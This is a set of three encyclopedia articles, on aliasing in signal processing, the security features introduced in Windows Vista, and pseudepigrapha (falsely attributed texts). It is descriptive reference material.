Afrequency spectrumof the samples produces equally strong responses at all those frequencies. Without collateral information, the frequency of the original function is ambiguous. So, the functions and their frequencies are said to bealiasesof each other. Noting the sine functions as odd functions:
thus, we can write all the alias frequencies as positive values:fN(f)≜|f+Nfs|{\displaystyle f_{_{N}}(f)\triangleq \left|f+Nf_{\rm {s}}\right|}. For example, a snapshot of the lower right frame of Fig.2 shows a component at the actual frequencyf{\displaystyle f}and another component at aliasf−1(f){\displaystyle f_{_{-1}}(f)}. Asf{\displaystyle f}increases during the animation,f−1(f){\displaystyle f_{_{-1}}(f)}decreases. The point at which they are equal(f=fs/2){\displaystyle (f=f_{s}/2)}is an axis of symmetry called thefolding frequency, also known asNyquist frequency.
Aliasing matters when one attempts to reconstruct the original waveform from its samples. The most common reconstruction technique produces the smallest of thefN(f){\displaystyle f_{_{N}}(f)}frequencies. So, it is usually important thatf0(f){\displaystyle f_{0}(f)}be the unique minimum. A necessary and sufficient condition for that isfs/2>|f|,{\displaystyle f_{s}/2>|f|,}called theNyquist condition. The lower left frame of Fig.2 depicts the typical reconstruction result of the available samples. Untilf{\displaystyle f}exceeds the Nyquist frequency, the reconstruction matches the actual waveform (upper left frame). After that, it is the low frequency alias of the upper frame.
The figures below offer additional depictions of aliasing, due to sampling. A graph of amplitude vs frequency (not time) for a single sinusoid at frequency0.6fsand some of its aliases at0.4fs,1.4fs,and1.6fswould look like the 4 black dots in Fig.3. The red lines depict the paths (loci) of the 4 dots if we were to adjust the frequency and amplitude of the sinusoid along the solid red segment (betweenfs/2andfs). No matter what function we choose to change the amplitude vs frequency, the graph will exhibit symmetry between 0 andfs.Folding is often observed in practice when viewing thefrequency spectrumof real-valued samples, such as Fig.4.
Complex sinusoidsare waveforms whose samples arecomplex numbers(z=Aeiθ=A(cosθ+isinθ){\textstyle z=Ae^{i\theta }=A(\cos \theta +i\sin \theta )}), and the concept ofnegative frequencyis necessary to distinguish them. In that case, the frequencies of the aliases are given by just:fN(f) =f+N fs.(In real sinusoids, as shown in the above, all alias frequencies can be written as positive frequenciesfN(f)≜|f+Nfs|{\displaystyle f_{_{N}}(f)\triangleq \left|f+Nf_{\rm {s}}\right|}because of sine functions as odd functions.) Therefore, asfincreases from0tofs,f−1(f)also increases (from–fsto 0). Consequently, complex sinusoids do not exhibitfolding.
When the conditionfs/2 >fis met for the highest frequency component of the original signal, then it is met for all the frequency components, a condition called theNyquist criterion. That is typically approximated by filtering the original signal to attenuate high frequency components before it is sampled. These attenuated high frequency components still generate low-frequency aliases, but typically at low enough amplitudes that they do not cause problems. A filter chosen in anticipation of a certain sample frequency is called ananti-aliasing filter.
The filtered signal can subsequently be reconstructed, by interpolation algorithms, without significant additional distortion. Most sampled signals are not simply stored and reconstructed. But the fidelity of a theoretical reconstruction (via theWhittaker–Shannon interpolation formula) is a customary measure of the effectiveness of sampling.
Historically the termaliasingevolved from radio engineering because of the action ofsuperheterodyne receivers. When the receiver shifts multiple signals down to lower frequencies, fromRFtoIFbyheterodyning, an unwanted signal, from an RF frequency equally far from thelocal oscillator(LO) frequency as the desired signal, but on the wrong side of the LO, can end up at the same IF frequency as the wanted one. If it is strong enough it can interfere with reception of the desired signal. This unwanted signal is known as animageoraliasof the desired signal.
The first written use of the terms "alias" and "aliasing" in signal processing appears to be in a 1949 unpublished Bell Laboratories technical memorandum[4]byJohn TukeyandRichard Hamming. That paper includes an example of frequency aliasing dating back to 1922. The firstpublisheduse of the term "aliasing" in this context is due toBlackmanand Tukey in 1958.[5]In their preface to the Dover reprint[6]of this paper, they point out that the idea of aliasing had been illustrated graphically by Stumpf[7]ten years prior.
The 1949 Bell technical report refers to aliasing as though it is a well-known concept, but does not offer a source for the term.Gwilym JenkinsandMaurice Priestleycredit Tukey with introducing it in this context,[8]though ananalogous concept of aliasinghad been introduced a few years earlier[9]infractional factorial designs. While Tukey did significant work in factorial experiments[10]and was certainly aware of aliasing in fractional designs,[11]it cannot be determined whether his use of "aliasing" in signal processing was consciously inspired by such designs.
Aliasing occurs whenever the use of discrete elements to capture or produce a continuous signal causes frequency ambiguity.
Spatial aliasing, particular of angular frequency, can occur when reproducing alight fieldor sound field with discrete elements, as in3D displaysorwave field synthesisof sound.[12]
This aliasing is visible in images such as posters withlenticular printing: if they have low angular resolution, then as one moves past them, say from left-to-right, the 2D image does not initially change (so it appears to move left), then as one moves to the next angular image, the image suddenly changes (so it jumps right) – and the frequency and amplitude of this side-to-side movement corresponds to the angular resolution of the image (and, for frequency, the speed of the viewer's lateral movement), which is the angular aliasing of the 4D light field.
The lack ofparallaxon viewer movement in 2D images and in3-D filmproduced bystereoscopicglasses (in 3D films the effect is called "yawing", as the image appears to rotate on its axis) can similarly be seen as loss of angular resolution, all angular frequencies being aliased to 0 (constant).
The qualitative effects of aliasing can be heard in the following audio demonstration. Sixsawtooth wavesare played in succession, with the first two sawtooths having afundamental frequencyof 440 Hz (A4), the second two having fundamental frequency of 880 Hz (A5), and the final two at 1760 Hz (A6). The sawtooths alternate betweenbandlimited(non-aliased) sawtooths and aliased sawtooths and the sampling rate is 22050 Hz. The bandlimited sawtooths are synthesized from the sawtooth waveform'sFourier seriessuch that no harmonics above theNyquist frequency(11025 Hz = 22050 Hz / 2 here) are present.
The aliasing distortion in the lower frequencies is increasingly obvious with higher fundamental frequencies, and while the bandlimited sawtooth is still clear at 1760 Hz, the aliased sawtooth is degraded and harsh with a buzzing audible at frequencies lower than the fundamental.
A form of spatial aliasing can also occur in antenna arrays or microphone arrays used to estimate the direction of arrival of a wave signal, as in geophysical exploration by seismic waves. Waves must be sampled more densely than two points perwavelength, or the wave arrival direction becomes ambiguous.[13]
|
https://en.wikipedia.org/wiki/Aliasing
|
Thereare a number ofsecurity and safetyfeatures new toWindows Vista, most of which are not available in any priorMicrosoft Windowsoperating systemrelease.
Beginning in early 2002 with Microsoft's announcement of itsTrustworthy Computinginitiative, a great deal of work has gone into making Windows Vista a more secure operating system than its predecessors. Internally, Microsoft adopted a "Security Development Lifecycle"[1]with the underlying ethos of "Secure by design, secure by default, secure in deployment". New code for Windows Vista was developed with the SDL methodology, and all existing code was reviewed and refactored to improve security.
Some specific areas where Windows Vista introduces new security and safety mechanisms include User Account Control, parental controls,Network Access Protection, a built-in anti-malwaretool, and new digital content protection mechanisms.
User Account Controlis a new infrastructure that requires user consent before allowing any action that requires administrative privileges. With this feature, all users, including users with administrative privileges, run in a standard user mode by default, since most applications do not require higher privileges. When some action is attempted that needs administrative privileges, such as installing new software or changing system or security settings, Windows will prompt the user whether to allow the action or not. If the user chooses to allow, the process initiating the action is elevated to a higher privilege context to continue. While standard users need to enter a username and password of an administrative account to get a process elevated (Over-the-shoulder Credentials), an administrator can choose to be prompted just for consent or ask for credentials. If the user doesn't click Yes, after 30 seconds the prompt is denied.
UAC asks for credentials in aSecure Desktopmode, where the entire screen is faded out and temporarily disabled, to present only the elevation UI. This is to prevent spoofing of the UI or the mouse by the application requesting elevation. If the application requesting elevation does not havefocusbefore the switch toSecure Desktopoccurs, then its taskbar icon blinks, and when focussed, the elevation UI is presented (however, it is not possible to prevent a malicious application from silently obtaining the focus).
Since theSecure Desktopallows only highest privilegeSystemapplications to run, no user mode application can present its dialog boxes on that desktop, so any prompt for elevation consent can be safely assumed to be genuine. Additionally, this can also help protect againstshatter attacks, which intercept Windows inter-process messages to run malicious code or spoof the user interface, by preventing unauthorized processes from sending messages to high privilege processes. Any process that wants to send a message to a high privilege process must get itself elevated to the higher privilege context, via UAC.
Applications written with the assumption that the user will be running with administrator privileges experienced problems in earlier versions of Windows when run from limited user accounts, often because they attempted to write to machine-wide or system directories (such asProgram Files) or registry keys (notablyHKLM)[2]UAC attempts to alleviate this usingFile and Registry Virtualization, which redirects writes (and subsequent reads) to a per-user location within the user's profile. For example, if an application attempts to write to “C:\program files\appname\settings.ini” and the user doesn't have permissions to write to that directory, the write will get redirected to “C:\Users\username\AppData\Local\VirtualStore\Program Files\appname\.”
BitLocker, formerly known as "Secure Startup", this feature offersfull disk encryptionfor the system volume. Using the command-line utility, it is possible to encrypt additional volumes. Bitlocker utilizes a USB key or Trusted Platform Module (TPM) version 1.2 of the TCG specifications to store its encryption key. It ensures that the computer running Windows Vista starts in a known-good state, and it also protects data from unauthorized access.[3]Data on the volume is encrypted with a Full Volume Encryption Key (FVEK), which is further encrypted with a Volume Master Key (VMK) and stored on the disk itself.
Windows Vista is the first Microsoft Windows operating system to offer native support for the TPM 1.2 by providing a set of APIs, commands, classes, and services for the use and management of the TPM.[4][5]A new system service, referred to as TPM Base Services, enables the access to and sharing of TPM resources for developers who wish to build applications with support for the device.[6]
Encrypting File System (EFS) in Windows Vista can be used to encrypt the systempage fileand the per-userOffline Filescache. EFS is also more tightly integrated with enterprisePublic Key Infrastructure(PKI), and supports using PKI-based key recovery, data recovery through EFS recovery certificates, or a combination of the two. There are also new Group Policies to requiresmart cardsfor EFS, enforce page file encryption, stipulate minimum key lengths for EFS, enforce encryption of the user'sDocuments folder, and prohibit self-signed certificates. The EFS encryption key cache can be cleared when a user locks his workstation or after a certain time limit.
The EFS rekeying wizard allows the user to choose a certificate for EFS and to select and migrate existing files that will use the newly chosen certificate. Certificate Manager also allows users to export their EFS recovery certificates and private keys. Users are reminded to back up their EFS keys upon first use through aballoon notification. The rekeying wizard can also be used to migrate users in existing installations from software certificates tosmart cards. The wizard can also be used by an administrator or users themselves in recovery situations. This method is more efficient than decrypting and reencrypting files.
Windows Vistasignificantly improves the firewall[7]to address a number of concerns around the flexibility ofWindows Firewallin a corporate environment:
Windows Vista includes Windows Defender, Microsoft's anti-spyware utility. According to Microsoft, it was renamed from 'Microsoft AntiSpyware' because it not only features scanning of the system for spyware, similar to other free products on the market, but also includes Real Time Security agents that monitor several common areas of Windows for changes which may be caused by spyware. These areas include Internet Explorer configuration and downloads, auto-start applications, system configuration settings, and add-ons to Windows such as Windows Shell extensions.
Windows Defender also includes the ability to removeActiveXapplications that are installed and block startup programs. It also incorporates theSpyNetnetwork, which allows users to communicate with Microsoft, send what they consider is spyware, and check which applications are acceptable.
Windows Vista allow administrators to enforce hardware restrictions viaGroup Policyto prevent users from installing devices, to restrict device installation to a predefined white list, or to restrict access to removable media and classes of devices.[8][9]
Windows Vista includes a range ofparental controlsfor administrators to monitor and restrict computer activity of standard user accounts that are not part of adomain;User Account Controlenforces administrative restrictions. Features include:Windows Vista Web Filter—implemented as aWinsockLSPfilter to function across all Web browsers—which prohibits access to websites based on categories of content or specific addresses (with an option to block all file downloads);Time Limits, which prevents standard users from logging in during a date or time specified by an administrator (and which locks restricted accounts that are already logged in during such times);Game Restrictions, which allows administrators to block games based on names, contents, or ratings defined by avideo game content rating systemsuch as theEntertainment Software Rating Board (ESRB), with content restrictions taking precedence over rating restrictions (e.g.,Everyone 10+ (E10+)games may be permitted to run in general, butE10+games with mild language will still be blocked if mild language itself is blocked);Application Restrictions, which usesapplication whitelistsfor specific applications; andActivity Reports, which monitors and records activities of restricted standard user accounts.
Windows Parental Controls includes an extensible set of options, withapplication programming interfaces(APIs) for developers to replace bundled features with their own.
Windows Vista usesAddress Space Layout Randomization(ASLR) to load system files at random addresses in memory.[10]By default, all system files are loaded randomly at any of the possible 256 locations. Other executables have to specifically set a bit in the header of thePortable Executable (PE)file, which is the file format for Windows executables, to use ASLR. For such executables, the stack and heap allocated is randomly decided. By loading system files at random addresses, it becomes harder for malicious code to know where privileged system functions are located, thereby making it unlikely for them to predictably use them. This helps prevent most remote execution attacks by preventingreturn-to-LIBCbuffer overflowattacks.
ThePortable Executableformat has been updated to support embedding ofexceptionhandler address in the header. Whenever an exception is thrown, the address of the handler is verified with the one stored in the executable header. If they match, the exception is handled, otherwise it indicates that the run-time stack has been compromised, and hence the process is terminated.
Function pointers are obfuscated byXOR-ingwith a random number, so that the actual address pointed to is hard to retrieve. So would be to manually change a pointer, as the obfuscation key used for the pointer would be very hard to retrieve. Thus, it is made hard for any unauthorized user of the function pointer to be able to actually use it. Also metadata for heap blocks are XOR-ed with random numbers. In addition, check-sums for heap blocks are maintained, which is used to detect unauthorized changes and heap corruption. Whenever a heap corruption is detected, the application is killed to prevent successful completion of the exploit.
Windows Vista binaries include intrinsic support for detection of stack-overflow. When a stack overflow in Windows Vista binaries is detected, the process is killed so that it cannot be used to carry on the exploit. Also Windows Vista binaries place buffers higher in memory and non buffers, like pointers and supplied parameters, in lower memory area. So to actually exploit, a buffer underrun is needed to gain access to those locations. However, buffer underruns are much less common than buffer overruns.
Windows Vista introducesMandatory Integrity Controlto set integrity levels for processes. A low integrity process can not access the resources of a higher integrity process. This feature is being used to enforce application isolation, where applications in a medium integrity level, such as all applications running in the standard user context can not hook into system level processes which run in high integrity level, such as administrator mode applications but can hook onto lower integrity processes like WindowsInternet Explorer 7or8. A lower privilege process cannot perform a window handle validation of higher process privilege, cannot SendMessage or PostMessage to higher privilege application windows, cannot use thread hooks to attach to a higher privilege process, cannot use Journal hooks to monitor a higher privilege process and cannot perform DLL–injection to a higher privilege process.
Windows Vista offers full support for theNX(No-Execute) feature of modern processors.[11]DEP was introduced in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. This feature, present as NX (EVP) inAMD'sAMD64processors and as XD (EDB) inIntel's processors, can flag certain parts of memory as containing data instead of executable code, which prevents overflow errors from resulting in arbitrary code execution.
If the processor supports the NX-bit, Windows Vista automatically enforces hardware-basedData Execution Preventionon all processes to mark some memory pages as non-executable data segments (like the heap and stack), and subsequently any data is prevented from being interpreted and executed as code. This prevents exploit code from being injected as data and then executed.
If DEP is enabledfor all applications, users gain additional resistance againstzero-day exploits. But not all applications are DEP-compliant and some will generate DEP exceptions. Therefore, DEP is not enforcedfor all applications by defaultin 32-bit versions of Windows and is only turned on for critical system components. However, Windows Vista introduces additional NX policy controls that allow software developers to enable NX hardware protection for their code, independent of system-wide compatibility enforcement settings. Developers can mark their applications as NX-compliant when built, which allows protection to be enforced when that application is installed and runs. This enables a higher percentage of NX-protected code in the software ecosystem on 32-bit platforms, where the default system compatibility policy for NX is configured to protect only operating system components. For x86-64 applications, backward compatibility is not an issue and therefore DEP is enforced by default for all 64-bit programs. Also, only processor-enforced DEP is used in x86-64 versions of Windows Vista for greater security.
Newdigital rights managementand content-protection features have been introduced in Windows Vista to help digital content providers and corporations protect their data from being copied.
The inclusion of newdigital rights managementfeatures has been a source ofcriticism of Windows Vista.
Windows Service Hardeningcompartmentalizes the services such that if one service is compromised, it cannot easily attack other services on the system. It prevents Windows services from doing operations on file systems, registry or networks[14]which they are not supposed to, thereby reducing the overallattack surfaceon the system and preventing entry of malware by exploitingsystem services. Services are now assigned a per-serviceSecurity identifier(SID), which allows controlling access to the service as per the access specified by the security identifier. A per-service SID may be assigned during the service installation via theChangeServiceConfig2API or by using theSC.EXEcommand with thesidtypeverb. Services can also useaccess control lists(ACL) to prevent external access to resources private to itself.
Services in Windows Vista also run in a less privileged account such asLocal ServiceorNetwork Service, instead of theSystemaccount. Previous versions of Windows ransystem servicesin the same login session as the locally logged-in user (Session 0). In Windows Vista, Session 0 is now reserved for these services, and all interactive logins are done in other sessions.[15]This is intended to help mitigate a class of exploits of the Windows message-passing system, known asShatter attacks. The process hosting a service has only the privileges specified in theRequiredPrivilegesregistry value underHKLM\System\CurrentControlSet\Services.
Services also need explicit write permissions to write to resources, on a per-service basis. By using a write-restrictedaccess token, only those resources which have to be modified by a service are given write access, so trying to modify any other resource fails. Services will also have pre-configured firewall policy, which gives it only as much privilege as is needed for it to function properly. Independent software vendors can also use Windows Service Hardening to harden their own services. Windows Vista also hardens thenamed pipesused byRPCservers to prevent other processes from being able to hijack them.
Graphical identification andauthentication(GINA), used for secure authentication and interactive logon has been replaced byCredential Providers. Combined with supporting hardware, Credential Providers can extend the operating system to enable users to log on throughbiometric devices(fingerprint, retinal, or voice recognition), passwords,PINsandsmart cardcertificates, or any custom authentication package and schema third-party developers wish to create. Smart card authentication is flexible as certificate requirements are relaxed. Enterprises may develop, deploy, and optionally enforce custom authentication mechanisms for all domain users. Credential Providers may be designed to supportSingle sign-on(SSO), authenticating users to a securenetwork access point(leveragingRADIUSand other technologies) as well as machine logon. Credential Providers are also designed to support application-specific credential gathering, and may be used for authentication to network resources, joining machines to a domain, or to provide administrator consent forUser Account Control. Authentication is also supported usingIPv6orWeb services. A new Security Service Provider, CredSSP is available throughSecurity Support Provider Interfacethat enables an application to delegate the user's credentials from the client (by using the client-side SSP) to the target server (through the server-side SSP). The CredSSP is also used by Terminal Services to providesingle sign-on.
Windows Vista can authenticate user accounts usingSmart Cardsor a combination of passwords and Smart Cards (Two-factor authentication). Windows Vista can also use smart cards to storeEFSkeys. This makes sure that encrypted files are accessible only as long as the smart card is physically available. If smart cards are used for logon, EFS operates in asingle sign-onmode, where it uses the logon smart card for file encryption without further prompting for the PIN.
Fast User Switchingwhich was limited to workgroup computers on Windows XP, can now also be enabled for computers joined to a domain, starting with Windows Vista. Windows Vista also includes authentication support for theRead-Only Domain Controllersintroduced inWindows Server 2008.
Windows Vista features an update to the crypto API known as Cryptography API: Next Generation (CNG). TheCNG APIis auser modeandkernel modeAPI that includes support forelliptic curve cryptography(ECC) and a number of newer algorithms that are part of theNational Security Agency(NSA)Suite B. It is extensible, featuring support for plugging in custom cryptographic APIs into the CNG runtime. It also integrates with thesmart cardsubsystem by including a BaseCSPmodule which implements all the standard backend cryptographic functions that developers and smart card manufacturers need, so that they do not have to write complexCSPs. The Microsoftcertificate authoritycan issue ECC certificates and the certificate client can enroll and validate ECC and SHA-2 based certificates.
Revocation improvements include native support for theOnline Certificate Status Protocol(OCSP) providing real-time certificate validity checking,CRLprefetching and CAPI2 Diagnostics. Certificate enrollment is wizard-based, allows users to input data during enrollment and provides clear information on failed enrollments and expired certificates. CertEnroll, a new COM-based enrollment API replaces theXEnrolllibrary for flexible programmability. Credential roaming capabilities replicate Active Directory key pairs, certificates and credentials stored inStored user names and passwordswithin the network.
Windows Vista introducesNetwork Access Protection(NAP), which ensures that computers connecting to or communicating with a network conform to a required level ofsystem healthas set by the administrator of a network. Depending on the policy set by the administrator, the computers which do not meet the requirements will either be warned and granted access, allowed access to limited network resources, or denied access completely. NAP can also optionally provide software updates to a non-compliant computer to upgrade itself to the level as required to access the network, using aRemediation Server. A conforming client is given aHealth Certificate, which it then uses to access protected resources on the network.
ANetwork Policy Server, runningWindows Server 2008acts as health policy server and clients need to useWindows XP SP3or later. AVPNserver,RADIUSserver orDHCPserver can also act as the health policy server.
A number of specific security and reliability changes have been made:
|
https://en.wikipedia.org/wiki/Security_and_safety_features_new_to_Windows_Vista
|
Apseudepigraph(alsoanglicizedas "pseudepigraphon") is afalsely attributedwork, a text whose claimedauthoris not the true author, or a work whose real author attributed it to a figure of the past. The name of the author to whom the work is falsely attributed is often prefixed with the particle "pseudo-",[1]such as for example "pseudo-Aristotle" or "pseudo-Dionysius": these terms refer to the anonymous authors of works falsely attributed toAristotleandDionysius the Areopagite, respectively.
Inbiblical studies, the termpseudepigraphacan refer to an assorted collection of Jewish religious works thought to be writtenc.300 BCE to 300 CE. They are distinguished byProtestantsfrom thedeuterocanonical books(Catholic and Orthodox) orApocrypha(Protestant), the books that appear in extant copies of theSeptuagintin the fourth century or later[2]and theVulgate, but not in theHebrew Bibleor inProtestant Bibles.[3]TheCatholic Churchdistinguishes only between the deuterocanonical and all other books; the latter are calledbiblical apocrypha, which in Catholic usage includes the pseudepigrapha.[citation needed]In addition, two books considered canonical in theOrthodox Tewahedochurches, theBook of EnochandBook of Jubilees, are categorized as pseudepigrapha from the point of view ofChalcedonian Christianity.[citation needed]
In addition to the sets of generally agreed to be non-canonical works, scholars will also apply the term to canonical works who make a direct claim of authorship, yet this authorship is doubted. For example, theBook of Danielis considered by some to have been written in the 2nd century BCE, 400 years after the prophetDaniellived, and thus the work is pseudepigraphic.[4][5]A New Testament example might be the book of2 Peter, considered by some to be written approximately 80 years afterSaint Peter's death. Early Christians, such asOrigen, harbored doubts as to the authenticity of the book's authorship.[6]
The term has also been used byQuranistMuslimsto describehadiths: Quranists claim that most hadiths are fabrications[7]created in the 8th and 9th century CE, and falsely attributed to the Islamic prophetMuhammad.[8]
The wordpseudepigraph(from theGreek:ψευδής,pseudḗs, "false" andἐπιγραφή,epigraphḗ, "name" or "inscription" or "ascription"; thus when taken together it means "false superscription or title";[9]see the relatedepigraphy). The plural of "pseudepigraph" (sometimesLatinizedas "pseudepigraphon" or "pseudepigraphum") is "pseudepigrapha".
When a text is shown to have been falsely attributed to a particular author, and the true identity of the author is not known, the author can be referred to by a combination ofpseudo-and the traditional authors name. For example, theArmenian Historyhas been falsely attributed to an Armenian historian named seventh-centurySebeos, and it is therefore called Pseudo-Sebeos.[10]
Scholars have identified seven levels of authenticity which they have organized in a hierarchy ranging from literal authorship, meaning written in the author's own hand, to outright forgery:[11]
Inbiblical studies,pseudepigrapharefers particularly to works which purport to be written by noted authorities in either the Old and New Testaments or by persons involved in Jewish or Christian religious study or history. These works can also be written about biblical matters, often in such a way that they appear to be as authoritative as works which have been included in the many versions of the Judeo-Christian scriptures.Eusebiusindicates this usage dates back at least toSerapion of Antioch, whom Eusebius records[12]as having said: "But those writings which are falsely inscribed with their name (ta pseudepigrapha), we as experienced persons reject...."
Many such works were also referred to asApocrypha, which originally connoted "private" or "non-public": those that were not endorsed for public reading in theliturgy. An example of a text that is both apocryphal and pseudepigraphical is theOdes of Solomon.[13]It is considered pseudepigraphical because it was not actually written by Solomon but instead is a collection of early Christian (first to second century) hymns and poems, originally written not in Hebrew, and apocryphal because they were not accepted in either theTanakhor theNew Testament.
There is a tendency not to use the wordpseudepigraphawhen describing works later than about 300 CE when referring to biblical matters.[3]: 222–28But the late-appearingGospel of Barnabas,Apocalypse of Pseudo-Methodius, thePseudo-Apuleius(author of a fifth-centuryherbalascribed to Apuleius), and the author traditionally referred to as the "Pseudo-Dionysius the Areopagite", are classic examples of pseudepigraphy. In the fifth century the moralistSalvianpublishedContra avaritiam("Against avarice") under the name of Timothy; the letter in which he explained to his former pupil, Bishop Salonius, his motives for so doing survives.[14]
The term pseudepigrapha is also commonly used to describe numerous works of Jewish religious literature written from about 300 BCE to 300 CE. Not all of these works are actually pseudepigraphical. It also refers to books of the New Testament canon whose authorship is misrepresented. Such works include the following:[3]
Various canonical works accepted as scripture have since been reexamined and considered by modern scholars in the 19th century onward as likely cases of pseudepigraphica. TheBook of Danieldirectly claims to be written by theprophet Daniel, yet there are strong reasons to believe it was not written until centuries after Daniel's death, such as references to the book only appearing from the 2nd century BCE onward. The book is an apocalypse wherein Daniel offers a series of predictions of the future, and is meant to reassure the Jews of the period that the tyrantAntiochus IV Epiphaneswould soon be overthrown. By backdating the book to the 6th century BCE and providing a series of correct prophecies as to the history of the past 400 years, the authorship claim of Daniel would have strengthened a later author's predictions of the coming fall of theSeleucid Empire.[6][15]
Christian scholars traditionally maintain that nothing known to be pseudepigraphical was admitted to the New Testament canon.
The Catholic Encyclopedia notes,
The first four historical books of the New Testament are supplied with titles, which however ancient, do not go back to the respective authors of those sacred texts.The Canon of Muratori,Clement of Alexandria, andSt. Irenaeusbear distinct witness to the existence of those headings in the latter part of the second century of our era. Indeed, the manner in which Clement (Strom. I, xxi), and St. Irenaeus (Adv. Haer. III, xi, 7) employ them implies that, at that early date, our present titles to the gospels had been in current use for some considerable time. Hence, it may be inferred that they were prefixed to the evangelical narratives as early as the first part of that same century. That however, they do not go back to the first century of the Christian era, or at least that they are not original, is a position generally held at the present day. It is felt that since they are similar for the four Gospels, although the same Gospels were composed at some interval from each other, those titles were not framed and consequently not prefixed to each individual narrative, before the collection of the four Gospels was actually made. Besides as well pointed out by Prof. Bacon, "the historical books of the New Testament differ from its apocalyptic and epistolary literature, as those of the Old Testament differ from its prophecy, in being invariably anonymous, and for the same reason. Prophecies, whether in the earlier or in the later sense, and letters, to have authority, must be referable to some individual; the greater his name, the better. But history was regarded as common possession. Its facts spoke for themselves. Only as the springs of common recollection began to dwindle, and marked differences to appear between the well-informed and accurate Gospels and the untrustworthy ... become worth while for the Christian teacher or apologist to specify whether the given representation of the current tradition was 'according to' this or that special compiler, and to state his qualifications". It thus appears that the present titles of the Gospels are not traceable to the Evangelists themselves.[16]
However, agnostic biblical scholarBart D. Ehrmanholds that only seven of Paul's epistles are convincingly genuine, and that all of the other 20 books in the New Testament appear to be written by unknown people who were not the well-known biblical figures to whom the early Christian leaders originally attributed authorship.[7]The earliest and best manuscripts of Matthew, Mark, Luke, and John were all written anonymously.[17]Furthermore, the books of Acts, Hebrews, 1 John, 2 John, and 3 John were also written anonymously.[17]
ThirteenNew Testamentlettersare attributed to Paul and are still considered by Christians to carry Paul's authority. These letters are part of theChristian Bibleand are foundational for the Christian Church. Therefore, letters which some claim to be pseudepigraphic are not considered any less valuable to Christians.[18]
Authorship of 6 out of the 13 canonical epistles of Paul has been questioned by both Christian and non-Christian biblical scholars.[19]These are theEpistle to the Ephesians,Epistle to the Colossians,Second Epistle to the Thessalonians,First Epistle to Timothy,Second Epistle to Timothy, andEpistle to Titus. These six books are referred by sceptical scholars such as Bart Ehrman as "deutero-Pauline letters", meaning "secondary" standing in the corpus of Paul's writings, on the grounds of proposed evidence that they could not have been written by Paul, despite internal attribution to Paul. Those known as the "Pastoral Epistles" (Timothy, 2 Timothy, and Titus) are all so similar that they are thought to be written by the same unknown author, either by Paul or in Paul's name.[7]
Seven New Testament letters are attributed to several apostles, such asSaint Peter,John the Apostle, and Jesus's brothersJamesandJude.
Three of the seven letters are anonymous. These three have traditionally been attributed toJohn the Apostle, the son of Zebedee and one of the Twelve Apostles of Jesus. Consequently, these letters have been labelled theJohannine epistles, despite the fact that none of the epistles mentions any author. Most modern scholars believe the author is not John the Apostle, but there is no scholarly consensus for any particular historical figure. (see:Authorship of the Johannine works).[20][21]
Two of the letters claim to have been written or issued bySimon Peter, one of the Twelve Apostles of Jesus. Therefore, they have traditionally been called thePetrine epistles. However, most modern scholars agree the second epistle was probably not written by Peter, because it appears to have been written in the early 2nd century, long after Peter had died. Yet, opinions on the first epistle are more divided; many scholars do think this letter is authentic.[22]
In one epistle, the author only calls himself James (ἸάκωβοςIákobos). It is not known which James this is supposed to be. There are several different traditional Christian interpretations of other New Testament texts which mention aJames, brother of Jesus. However, most modern scholars tend to reject this line of reasoning, since the author himself does not indicate anyfamilial relationship with Jesus. A similar problem presents itself with the Epistle of Jude (ἸούδαςIoudas): the writer names himself a brother of James (ἀδελφὸς δὲ Ἰακώβουadelphos de Iakóbou), but it is not clear which James is meant. According to some Christian traditions, this is the same James as the author of the Epistle of James, who was allegedly a brother of Jesus; and so, this Jude should also be a brother of Jesus, despite the fact he does not indicate any such thing in his text.[22]
TheGospel of Peter[23]and the attribution to Paul of theEpistle to the Laodiceansare both examples of pseudepigrapha that were excluded from the New Testament canon.[24]They are often referred to asNew Testament apocrypha. Further examples of New Testament pseudepigrapha include theGospel of Barnabas[25]and theGospel of Judas, which begins by presenting itself as "the secret account of the revelation that Jesus spoke in conversation with Judas Iscariot".[26]
TheVision of Ezrais an ancientapocryphaltext purportedly written by the biblicalscribeEzra. The earliest surviving manuscripts, composed inLatin, date to the 11th century CE, although textual peculiaritiesstrongly suggestthat the text was originally written inGreek. Like theGreek Apocalypse of Ezra, the work is clearly Christian, and features several apostles being seen inheaven. However, the text is significantly shorter than the Apocalypse.
TheDonation of Constantineis a forged Roman imperial decree by which the 4th-century emperorConstantine the Greatsupposedly transferred authority over Rome and thewestern partof theRoman Empireto thePope. Composed probably in the 8th century, it was used, especially in the 13th century, in support ofclaims of political authority by the papacy.[27]Lorenzo Valla, an ItalianCatholicpriest andRenaissance humanist, is credited with first exposing the forgery with solidphilologicalarguments in 1439–1440,[28]although the document's authenticity had been repeatedly contested since 1001.[27]
In Russian history, in 1561 Muscovites supposedly received a letter from thePatriarch of Constantinoplewhich asserted the right ofIvan the Terribleto claim the title ofTsar. This, too, turned out to be false.[29]While earlier Russian Monarchs had on some occasions used the title "Tsar", Ivan the Terrible previously known as "Grand Prince of all the Russias" was the first to be formally crowned as Tsar of All Rus (Russian:Царь Всея Руси). This was related to Russia's growing ambitions to become an Orthodox "Third Rome", after theFall of Constantinople– for which the supposed approval by the Patriarch added weight.[30][31]
TheAnaphoraeofMar Nestorius, employed in theEastern Churches, is attributed toNestorius, but its earliest manuscripts are in Syriac, which question its Greek authorship.[32][33]
TheZohar(Hebrew:זֹהַר, lit. Splendor or Radiance), foundational work in the literature of Jewish mystical thought known asKabbalah,[34]first appeared inSpainin the 13th century, and was published by a Jewish writer namedMoses de León. De León ascribed the work toShimon bar Yochai("Rashbi"), arabbiof the 2nd century during the Roman persecution[35]who, according to Jewish legend,[36][37]hid in a cave for thirteen years studying the Torah and was inspired by theProphetElijahto write the Zohar. This accords with the traditional claim by adherents that Kabbalah is the concealed part of theOral Torah. Modern academic analysis of the Zohar, such as that by the 20th century religious historianGershom Scholem, has theorized that de León was the actual author, as textual analysis points to a Medieval Spanish Jewish writer rather than one living in Roman-ruled Palestine.
Conrad Celtes, a notedGermanhumanistscholar and poet of theGerman Renaissance, collected numerous Greek and Latin manuscripts in his function as librarian of the Imperial Library in Vienna. In a 1504 letter to the Venetian publisherAldus Manutius[38]Celtes claimed to have discovered the missing books ofOvid'sFasti. However, it turned out that the purported Ovid verses had actually been composed by an 11th-century monk and were known to theEmpire of Nicaeaaccording toWilliam of Rubruck. Even so, many contemporary scholars believed Celtes and continued to write about the existence of the missing books until well into the 17th century.[39]
